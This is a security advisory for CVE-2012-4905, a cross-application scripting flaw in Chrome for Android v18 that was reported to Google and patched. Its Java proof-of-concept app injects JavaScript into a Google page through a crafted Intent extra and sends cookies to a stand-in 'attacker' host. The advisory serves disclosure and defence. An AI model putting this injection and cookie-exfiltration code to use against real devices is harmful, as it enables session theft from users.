Chrome for Android - UXSS via com.android.browser.application_id Intent extra

CVE Number: CVE-2012-4905
Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability

Overview:
By sending a crafted Intent to Chrome for Android, malicious Android apps can
inject javascript into arbitrary Web pages rendered in Chrome. Such kind of
UXSS-like vulnerabilities is often called Cross-Application Scripting.

Details:
When other Android apps send an Intent with javascript: URI to Chrome for
Android (v18.0.1025123), Chrome opens a new tab and execute the JavaScript
code in the context of the blank domain. Probably this is a countermeasure
against UXSS attacks.

However, this can be bypassed by an Intent with Extra data as below:

intent.putExtra("com.android.browser.application_id", "com.android.chrome");

With an Intent that contains such Extra data, Chrome loads javascript: URI
(written in the Intent) in the current foreground tab, not in a blank tab.

This enables malicious Android apps to execute arbitrary JavaScript code in
arbitrary domains on Chrome. As a result, other apps are able to steal Cookies
and so on.

Proof of Concept:
package jp.mbsd.terada.attackchrome1;

import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.net.Uri;

public class Main extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}

  // get intent to invoke the chrome app
  public Intent getIntentForChrome(String url) {
      Intent intent = new Intent("android.intent.action.VIEW");
      intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
      intent.setData(Uri.parse(url));
      return intent;
  }

  public void doit() {
      try {
          // At first, force the chrome app to open a target Web page
          Intent intent1 = getIntentForChrome("http://www.google.com/1");
          startActivity(intent1);

          // wait a few seconds
          Thread.sleep(3000);

          // JS code to inject into the target (www.google.com)
          String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
              + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
              + "document.body.appendChild(img);";

          Intent intent2 = getIntentForChrome(jsURL);

          // Trick to prevent Chrome from opening the JS URL in a different tab
          intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
          intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);

          // Inject JS into the target Web page
          startActivity(intent2);
      }
      catch (Exception e) {}
  }

}

Timeline:
2012/07/07 Reported to Google security team.
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144813